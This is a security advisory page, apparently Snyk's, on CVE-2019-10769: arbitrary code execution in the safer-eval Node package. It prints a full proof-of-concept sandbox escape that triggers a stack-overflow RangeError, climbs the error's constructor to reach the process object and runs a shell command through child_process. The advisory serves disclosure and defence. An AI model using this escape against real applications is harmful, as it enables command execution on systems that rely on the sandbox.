Arbitrary Code Execution Affecting safer-eval package, versions *
Threat Intelligence
Exploit Maturity
Proof of concept
EPSS
0.86% (83rd
percentile)
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk ID SNYK-JS-SAFEREVAL-534901
- published 6 Dec 2019
- disclosed 6 Dec 2019
- credit Jonathan Leitschuh
Introduced: 6 Dec 2019
CVE-2019-10769 Open this link in a new tabHow to fix?
A fix was pushed into the master branch but not yet published.
Overview
safer-eval is a safer approach for eval in node and browser.
Affected versions of this package are vulnerable to Arbitrary Code Execution via generating a RangeError: Maximum call stack size exceeded.
PoC by Jonathan Leitschuh
const theFunction = function () {
const f = Buffer.prototype.write;
const ft = {
length: 10,
utf8Write(){
}
};
function r(i){
var x = 0;
try{
x = r(i);
}catch(e){}
if(typeof(x)!=='number')
return x;
if(x!==i)
return x+1;
try{
f.call(ft);
}catch(e){
return e;
}
return null;
}
var i=1;
while(1){
try{
i=r(i).constructor.constructor("return process")();
break;
}catch(x){
i++;
}
}
return i.mainModule.require("child_process").execSync("id").toString()
};
const untrusted = `(${theFunction})()`;
console.log(saferEval(untrusted));
CVSS Scores
version 3.1